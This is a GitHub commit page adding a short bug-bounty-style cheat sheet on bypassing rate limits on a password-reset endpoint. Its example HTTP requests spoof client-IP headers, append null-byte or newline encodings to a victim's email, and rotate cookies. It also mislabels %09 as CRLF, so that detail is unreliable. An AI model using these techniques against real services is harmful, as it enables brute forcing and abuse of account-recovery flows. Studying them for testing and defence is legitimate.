Bypass Rate Limit [1]

Create Rate Limit Tips and add 3 tips
This commit is contained in:
Muhammad Daffa 2020-09-19 06:52:32 +07:00 committed by GitHub
parent 4a3d3210b8
commit 753e0e5031
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

47
BypassRateLimit.md Normal file
View File

@ -0,0 +1,47 @@
# Bypass Rate Limit
1. Try add some custom header
```
X-Forwarded-For : 127.0.0.1
X-Forwarded-Host : 127.0.0.1
X-Client-IP : 127.0.0.1
X-Remote-IP : 127.0.0.1
X-Remote-Addr : 127.0.0.1
X-Host : 127.0.0.1
```
For example:
```
POST /ForgotPass.php HTTP/1.1
Host: target.com
X-Forwarded-For : 127.0.0.1
[...]
email=victim@gmail.com
```
2. Adding Null Byte ( %00 ) or CRLF ( %09, %0d, %0a ) at the end of the Email can bypass rate limit.
```
POST /ForgotPass.php HTTP/1.1
Host: target.com
[...]
email=victim@gmail.com%00
```
3. Try changing user-agents, cookies and IP address
```
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: xxxxxxxxxx
[...]
email=victim@gmail.com
```
Try this to bypass
```
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: aaaaaaaaaaaaa
[...]
email=victim@gmail.com
```